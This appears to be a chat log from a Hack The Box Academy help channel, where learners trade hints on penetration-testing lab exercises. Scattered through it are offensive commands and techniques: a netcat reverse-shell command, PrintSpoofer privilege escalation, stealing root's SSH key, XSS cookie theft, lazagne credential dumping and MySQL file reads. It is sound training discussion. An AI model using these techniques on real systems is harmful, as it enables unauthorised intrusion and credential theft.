Guys need your help with fixing an error within privileges escalation to SYSTEM on the SQL01 using the PrintSpoofler.exe.
Who knows whats wrong? How did you get this rid to receive a shell on your listener? Thanks for any help.

VERBOSE: 172.16.7.60,1433 : Connection Success.

output

[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
CreateProcessAsUser() failed. Error: 2

Did you use the 64bit version?

I'm not sure, it is PrintSpoofer.exe

I used ||PrintSpoofer64.exe||

Well, it can be a reasonably. Thanks man!👍

Hello
can i reset my modules ? 😄

iam finish with the BBP but i want to do it again for the exam

If you find a way let me know. I want to do the same. I know there is a "Retake Module" button, but I don't know if that deletes the progress.

i think that it does

hm
where

If you click on the finished modules, you get to a page where the "Retake Module" button is (where the shareable links are also)

Thanks, @west canopy , that one 😆

danm

do i have to click extra on the "finish" button in the module to come on this page ?

but well thx for that

Has anyone ever experienced changed behavior after respawning a machine? I just spent hours on an exercise and when I respawned the machine I noticed a slightly different request in burp, which made the solution easy. But before the respawn it behaved differently.

which module/section specifically? I dont think i have encountered anything like this

besides the Starting Point machines buggin' out from time to time

I mean your browser is what makes the web request, not the target.

you might get a different response in burp. But different request, i think that is client side 😉

"PHP Filters" section in the "File Inclusion" module. It appeared as if the machine from another section was spawned. It was very similar (that's why I didn't notice it at first - I thought it was supposed to be that way), but the request was different.

Before respawn:
http://178.62.107.21:32468/index.php?language=languages/en.php

After respawn:
http://206.189.117.48:30013/index.php?language=en

Or maybe I did something wrong without noticing it. No idea.

ah i see what u mean

The language selection on the website triggered these requests.

Hey, I am stuck at module "Getting started" 'pentesting basics/priviledge escalation'

I am logged in the server as user2, but do not know how to get to root

@short brook take a look inside ||/root ||

specifically there is something we can do using|| ssh keys|| to help us escalate to root 😉

Guys, what does it mean when we don't receive any response to a request in Burp ?

it means the server is hanging

or its executing your code 🙂

uhh

@west canopy do u happen to know which acc on MS01 i can log into using the creds from SQL01

I'm literally gonna cry. I don't understand ssh and the keys and whatnot

i ran ||lazagne|| and found the ||DefaultPassword||

what about ssh and keys do u not get

@foggy stirrup the user should be ||mssqlsvc|| .... i think i dumped the password with ||lazagne|| but its kind of unclear in my notes... the password is in a weird format and kind of hard to see

SSH private keys are basically passwords u can use them to login

yeah this

i got this

but it cant login weirdly

@foggy stirrup yes the password is hard to make out

sec ill DM you

sure thing

thx

I've been waiting for a long time and nothing :/

I understand that I can login with them, but howwwww????

well ... if the server replies with a 200 then it's a success... and a 404 means the resource doesn't exist

what does it mean if we don't get a response from the server?

u pass it in as -i

On attacking common services - DNS. Seen similar posts in here about finding one or MANY subs based on the tool used, im in the same boat. Found ||hr.inlanefreight.htb|| which seems to be the best lead, but unable to enumerate anything useful. A nudge would be appreciated 🙂

Bruuu, I'm new to this... What should I pass in where? Explain it slowly. If you can dm me

oh ok

il dm u

That's the thing, I am using the repeater to send a post request and when I click on 'send', nothing, no response. When I try the request manually with the browser, the server does respond so the problem doesn't seem to come from the server

@short brook we want to make a copy of the id_rsa file so we can have one on our attack machine. From there, we can run chmod 600 against the id_rsa file, and then use it to SSH in as the root user.

How do I make a copy? I don't have permission as user2 to do anything

DM me 😉

So I'm on the web proxy module I need to locate the second flag I can see the root directory, since the clue is that the flag is in a different directory I know it's there but how do I get into it. I'm pretty sure I followed the breadcrumbs but just ended up back with the original flag

can't we just|| cat /flag.txt|| ?

For the first flag

maybe|| flag.txt ||and|| /flag.txt|| are different...?

Thank you

hi there
at the moment i'm at the module metasploit. the section encoders did really catch my attention...

at the end of this sections it is written: As expected, most anti-virus products that we will encounter in the wild would still detect this payload so we would have to use other methods for AV evasion that are outside the scope of this module.

Does Anybody know if there is another Module at htb academy who is going deeper into that field - encoders and eventually malware analysis?

Hi im working on the wordpress module for the skill asessment. I have gotten acess to the ||erika|| account but I cannot update the theme editor since I keep getting this error: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means such as using SFTP.

Does anyone know how to fix this?

Currently, to my knowledge, there are no such modules.

Who can help get my ssh key

ok thanks.
in this course they shared some links who explain SGN deeper.
there also other article who explain for example ramsomware in case somebody else is interested to learn more in that field, just explore these links ;)!

I have just learned this today. DM me and I'll help you

AD Enumeration & Attacks - Skills Assessment Part II
Who had faced with the following issue before while escalating privileges using PrintSpoofler.exe?

c:\Users\Public\nc64.exe 172.16.7.240 4444 -e cmd: forward host lookup failed: h_errno 11001: HOST_NOT_FOUND

Mind if I ask how you solved this issue? I am also running into it

hey can someone please help me?
I cannot seem to figure out how to load this unsigned powershell module.
I try to use the set-execution policy directive but I don't understand what I am doing wrong ...

make sure you download the right one etc and check the proxy cfg file

https://github.com/jpillora/chisel/releases?

or else yeah go ahead and ask pm

Ah, cool, thanks! I have to run out, but I'll look into it more later.

Can anyone point me in a direction with decoding the flag for the web proxy module. I'm running it through burp encoding it with url and base 64 as the hint said and I'm getting no where

Maybe we have to ||base64 decode multiple times?||

EDIT: which section/question are you on?

That's not working

I'm on encoding/ decoding the challenge states: the string found in the attached file has been encoded several times with various encoders. Try to use the decoding tools to get the flag. Hint use base 64 and url encoding. I've encoded the string with both multiple times. I've tried to decode the string with both i

yes try base64 decoding multiple times

then switch to a different type of decoding 😉

I know its right in front of my face and im just missing it however, I need to do the scan for the Public Exploits module and I can not think of what I should use to scan it with. I know nmap only works for devices on your local network/vpn. What am I missing?

TLDR: How do you scan IP's that arent on your network again?

try navigating to the target:port in your browser using http protocol

Hello, I'm new to HTB and have newbie issues. I'm on the module HTTP Headers and I have found flag_...., but when I paste it into the answer section it says it is not right. Am I supposed to find a way to open the .txt file?

make sure you don't have any formatting errors like a trailing space at the end

Ok I will give it another shot after I get another instance tomorrow

Doing the Setting Up module, I'm right at the end, hardening my VPS, but now that I'm trying to log back in after setting up 2FA I'm getting this error

Permission denied (publickey)

can you undo the change ?

Restoring sshd_config seems to fix it

erm so that error is from ssh
make sure public key use is enabled + you have the right keys in authorized_keys

can i dm u

Could I have help with the session security skills assesment?

I am confused what it is wanting me to do haha

I found an XSS endpoint -- was pretty easy

I also know how to do session hijacking with XSS.

try to use some of the ||cookies stealing|| method show in that module after you got the url payload send to given api so the admin can click it

I guess my question is how do I submit my malicious url to admin?

I see the /submit-solution page

with the given api

yep that one

Something like this?

I'm probably really stupid but I really don't know how to send with the given api

no there should be some instructions on that web page

i think it's /submit-solution?url=(your payload)

yep this one

session security skill assessment had me geeking out for three days

when i finally got it i was so hyped

i may have dropped some F bombs

and claimed myself a god

for the session security skill assessment i completely forgot about the api so i was stuck for a few hours trying to figuring out what to do next

Hi all, in the Skills Assessment - WordPress the error "Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP." its normal or i've just broke the machine?

or this is just not the way?

I don't remember the skills assesment being too difficult

Probably overthinking it

there's a little twist

with the ||blog ||page

unless you set the vhost, then it looks like the target isnt wp

I already have the blog and the girls name and password

im triyng to get the payload working on the template

but wordpress gave me that error

changed the admin password and tried to login with admin and change the template but it wont let me

try with themes instead of template

i tried on 404.php, archive.php, etc

did you do that with the twenty nineteen theme?

can I dm you?

sure

THanks Mrtom and Jarednexgent

Super close to finishing all CBBH modules

heck yes

get some

Did you ever get the Advance File Disclosure to work?

With the Advanced File Disclosure did anyone have trouble with the CDATA or the Error based way to get the data?

No dice, still didn't work

Did you ever find a fix for this?

Hi, just want to check for Attacking Common Services - Easy is the correct path to get the flag going through ||the sql and creating a webshell and then trying to get a reverse shell from there?|| Seems kind of over complicated to me. Maybe im just bad.

The easy one feels like medium/hard and the medium one is really easy haha.

I know for that one there is two ways to solve it. There is a ||ftp route ||

do i HAve to keep it legal

Yes.

I just finished the "getting started" module, and I wanted to verify for the Knowledge Check.. was it actually possible to recover the username/password ? I ended up solving it with help from metasploit, but I spent a week and a half trying to figure out how to manually tackle the task.

hi for downloading all files in ftp there is this command wget -m --no-passive ftp://anonymous:anonymous@<target> but how do i download all from non-standard port?

Read our #rules 7. Do not advertise.

sorry

yayyyy

we win these

Can anyone help me on Attacking Common Services - Hard the last part on flag.txt? kinda lost after almost the whole day. :<

Is the Username Brute Force module missing a username wordlist? I can't find the one they say to use and I've tried many different things.. I overcomplicate things often so I know that's likely the case here I'm just stuck.

JFC nevermind I'm stupid. By 'section' I thought they meant earlier on the same page.

Can I get a hand with the footprinting lab - hard? I am struggling with the SNMP walk.

i'm not sure if i remember this correctly but you can bruteforce it with ||onesixtyone and then braa||

Thanks @timber light. I tried and discovered that I'm not doint it right.

Can I DM someone about Chisel section in Tunneling, Pivoting and Port Forwarding module?

Hey, i am doing the footprinting module > the medium skill assesment lab. I managed to log in with a priviledged account but when i check the database its empty. am i missing something?

@fathom bay DM me

hi i need some help with the Footprinting module DNS section last question i found 20 subdomain try to do a dns zone transfer with all of it and try the dnsenum tool show in that section with all 20 subdomain but no luck

If I can remember correctly, you need to enumerate subdomains of one of the found subdomains

You need to find all the zones.
Remember that there are servers that do not allow zone transfer from everyone.

I'm a bit confused, do we necessarily need the VIP membership to start hacking some machines on HTB ?

yep i'm trying this no luck

ohh ok

i'm confused about that too but no without vip you can only hack the machine or box that are live right now

So it is not possible to hack retired machine withou vip ? Here https://app.hackthebox.com/vip it says 2x Machines for the free plan and 190+ Machines for VIP

no idea i think 2x Machines mean you can only access 2 retired machine maybe?

I think so, I tried to start the instance of the easy machine You know 0xDiablos and it worked, but for others it asks for the VIP subscription

Has anyone had, and found a fix for the libcrypto.so issue with ptunnel on the target machine in the Pivoting with ptunnel section?

is hack the box crashed?

i'm trying to connect but it responds with bad gateway error

yes looks like some webserver issue

It seems to be down just now, please just wait a couple minutes

no problem it was just for info

got it thanks @brave prawn @acoustic owl and i'm so dumb, i found the right subdomain but i can't do a dns zone transfer with it so i didn't even check that subdomain ip 🤣🤦‍♂️ got stuck for a good while

Hello on the module Web proxies at Repeating Requests https://academy.hackthebox.com/module/110/section/1051
I don't know how to find the other flag. The hint says it is in another directory but how can I change directories from burpsuite?
I tried "cd .." but it dosen't work

HI, anybody on Penetration testing process?
I think there is an error on a question: What is the name of the security regulation for credit card payments a company must adhere to?

use ls to find the flag and use cat to get the flag you don't cd

that question sounds familiar what the module?

and section

if I ls it gives me the flag from the exercise before

I need to find another flag

use ls with a different directory

Penetetration Testing Proces. Section Post Explotation. Ask for Security regulation but the answer is almost the same under Framework.

how can I do that ? Give a an example pls

Ask for Security regulation but the answer is almost the same under Framework.

So, not sure if it is ok or I am wrong.

oh i thought that was the web info module or something but sorry i haven't done that module yet but i'm sure someone have will help you on that

ls (different directory) so example if you want to list file in /opt use ls /opt and pls do the linux module

so I should try ls root for example ?
I know the commands but I am now learning burp sweet so it is a bit unusual

I did pwd and I am in /var/www/html.

in burp you can just run normal linux command just url encode that with ctrl + U

and yes try this

I think I am doing some mistakes somewhere

shoot me a dm if you still have issue that

pm me

how can i dowload hackthebox

i checked the page and i could find the download link

I would help you, but you main Yasuo

🤣

^ so true

I just finished the Getting Started module. I feel so refreshed. Now Imma take a nap🤣

I remember that module being brutal for a beginner haha

Plus Nibbles is a horrible first box to do

It was awful yes, but atleast I learned something. Now I have to start with Network Enumeration with NMAP

hopefully next year amd drop a 32 core cpu @ 8.6 Ghz

and all their cpu have a boost frequency of 8.6 Ghz

and some big cpus of 64, 128, 256, 512 cores

for server and work station

hey can anyone give me a nudge on how to start the footprinting hard lab? i did an nmap and only got an imap/pop3 server and i cant get anything out of it cause i think i need a login

Could someone give me some help on DNS Footprinting on the last question What is the FQDN of the host where the last octet ends with "x.x.x.203"?"

Dm me 😊

Infrastructure is down? Machines not pinging

From vpn and pwnbox

is there someone that can help me with the public exploits section of getting started?

@rigid minnow DM me

try snmp walk

Attacking Common services - easy. Have creds for ||fiona||. Found the ||.txts in the mysql database and what they curl||. Based on past labs, this is a hint to put a ||reverse shell in one of the directory's in the .txts||. Have been unsuccessful in doing so, would appreciate a nudge :). Also tried to ||deliver payload via mysql for rev shell||, no bueno

Yes of course, DM me

guys im trying to enum the user names in the Footprinting Module / SMTP

Downloaded the footprinting wordlist and using this command

||smtp-user-enum -M VRFY -U /home/kali/Desktop/footprinting-wordlist.txt -t 10.129.xx.xxx||

but it gives me 0 results

i even checked the next section and there is the answer so i modified my wordlist with just that name and tried again

still 0 results.

i dont get it

so the metasploit method worked fine

but i do not understand why the smtp-user-enum didnt wokred

thank you so much!

someone give me a paypal account with no balance to keep my money

😌 🙌

😎🌿🔥

Can I get help with the footprinting Lab - Hard. I have access to the db and having trouble with decryption. 🙃

someone send me windows xp

if you check ||fiona|| user privilege you'll find she has ||FILE privilege|| means she can read local files with the command ||select LOAD_FILE("path to the file here");||

for smtp-user-enum your command is missing the domain, needs to be added with ||-D <domain here>||

Do I need a specific wordlist? I'm stuck

what are you trying to decrypt? if you've access to the db what you're looking is on the ||users table||

The hashes I found in the db? Trying to get to the HTB, didn't find that but other creds...

you don't need the hashes, once on the server you can list all databases available in there and use ||select * from users;|| you'll eventually find the pass

May I dm you?

sure

If im not getting scan results should i just reset the box

on attacking common services hard

dead

Hey, anyone here done the Linux PrivEsc Assessment? I've had to skip flag1 and after finding 2,3,4 i decided to circle back.

I've found the ||cat /var/www/html/flag1.txt entry in ./bash_history|| but the actual file doesn't exist.** Is this just a red herring? **

I've also used find / -name flag1.txt 2>/dev/null and the file can't be found.

@fringe shell check for hidden files/folders 😉

@west canopy thanks for the help... privesc to root gave me less trouble than that dang flag

For Pivoting, Tunneling, and Port Forwarding with SocksOverRDP, I am having a spot of trouble. I have SocksOverRDP running on the connection with username:victor and I have Proxifier configured for 127.0.0.1:1080, but when I try to use mstsc.exe from the main target to connect to the final target, it keeps telling me the Remote Connection won't work, and it doesn't show up in Proxifier. What am I doing wrong? For serious? It didn't like me running mstsc.exe from an Administrator command prompt. 🙄

Has anyone done the Footprinting module for the DNS challenges? Finding the FQDN that ends in x.x.x.203 has me stumped. I tried zone transferring to every subdomain and brute forcing with multiple word lists. Coming to a dead end tbh

Anyone able to help me out on Attacking Enterprise Networks Post Exploitation? I've got everything in place but no shell after running dc_shell.exe

Hi, im new to HTB and currently stuck at food printing FTP. The question is " Which version of the FTP server is running on the target system? Submit the entire banner as the answer." I thought it was "220 InFreight FTP v1.1" but it seems not correct. is there anyway to find the answer? thank you

220 is a ftp status

*return code

so how can i get to the right answer

I cant tell you that

The same thing is happening to me, were you able to solve it?

I think you'll find it works if you get rid of the 220

Okay, I am stuck on Question 3 of the Skills Assessment for Pivoting, Tunneling, and Port Forwarding if someone has a moment.

it doesssss, thank you !!!

what was the question again?

I found the credentials for ||mlefay|| and I thought I found the first internal server, from the webshell, at ||172.16.5.15|| but that seems to not be the answer to the question, so I'm not sure what I'm otherwise looking for, or where to go from here.

have you run a ||ping sweep scan?|| if you did, you'll find another host on that network

See this is why I need to organize and maybe color code my notes. I thought I could only use msfconsole for that. I completely overlooked using code for it. Thanks.

Hmmm. It's tossing back ||ping: 172.16.5.{1..254}: Name or service not known||

try the one liner command instead

This is what I used: ||for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done||

try this ||for /L %i in (1 1 254) do ping 172.16.5.%i -n -w 100 | find "Reply"||

No dice. Doesn't give me anything. As a side note, I kinda hate this webshell.

DM

anyone can DM if they know, i spent too much time on it skipping it for now.

DM me 😉

@vale salmon do you still need help with port forwarding skill assessment?

Not at the moment, but thanks!

Anyone able to help me out on Attacking Enterprise Networks Post Exploitation? I've got everything in place but no shell after running dc_shell.exe

Hey guys

I cannot get the flag on the Server Side Attacks - SSTI I

I got the shell connected to the target but I don't understand how to access the environmental variables

example 1,2, or 3?

yes, the double hop messes up kerberos
https://academy.hackthebox.com/module/143/section/1573